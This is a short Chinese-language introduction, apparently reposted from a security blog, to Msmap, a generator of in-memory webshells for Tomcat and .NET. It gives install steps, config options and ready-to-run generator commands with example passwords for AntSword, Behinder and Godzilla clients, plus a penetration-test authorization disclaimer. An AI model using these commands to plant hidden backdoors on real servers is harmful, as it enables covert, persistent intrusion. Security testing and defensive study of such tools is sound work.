0x01 工具介绍
Msmap是一个内存马生成器,兼容多种容器、组件、编码器、WebShell / Proxy / Killer 和管理客户端。本文中涉及到的所有操作均得到了客户单位的授权,并且在漏洞修复后得以公开。请勿在未授权状态下进行任何形式的渗透测试!!!!
0x02 安装与使用
1、一般使用方法
git clone git@github.com:hosch3n/msmap.git cd msmap python generator.py [注意] 尽量用独一无二的密码;各选项大小敏感
2、进阶使用方法
编辑 config/environment.py # 自动编译 auto_build = True # Base64编码类字节码 b64_class = True # 生成脚本 generate_script = True # 编译器绝对路径 java_compiler_path = r"~/jdk1.6.0_04/bin/javac" dotnet_compiler_path = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" 编辑 gist/java/container/tomcat/servlet.py // Servlet路径匹配规则 private static String pattern = "*.xml"; WsFilter暂不支持自动编译。如果使用了加密编码器,密码需要与路径相同(如/passwd)
3、蚁剑
JSP类型 搭配 default 编码器 | 注入到 Tomcat Valve python generator.py Java Tomcat Valve RAW AntSword passwd JSP类型 搭配 aes_128_ecb_pkcs7_padding_md5 编码器 | 注入到 Tomcat Listener python generator.py Java Tomcat Listener AES128 AntSword passwd JSP类型 搭配 rc_4_sha256 编码器 | 注入到 Tomcat Servlet python generator.py Java Tomcat Servlet RC4 AntSword passwd JSPJS类型 搭配 aes_128_ecb_pkcs7_padding_md5 编码器 | 注入到 Tomcat WsFilter python generator.py Java Tomcat WsFilter AES128 JSPJS passwd
4、冰蝎
default_aes类型 | 注入到 Tomcat Valvepython generator.py Java Tomcat Valve AES128 Behinder rebeyond
5、哥斯拉
JAVA_AES_BASE64类型 | 注入到 Tomcat Valve python generator.py Java Tomcat Valve AES128 Godzilla superidol
0x03 下载地址
1、通过项目地址下载即可
项目地址:https://github.com/hosch3n/msmap
X0_0X
FreeBuf
上官雨宝
一颗小胡椒
Anna艳娜
安全侠
Anna艳娜
FreeBuf
上官雨宝
007bug
安全侠
数缘信安社区
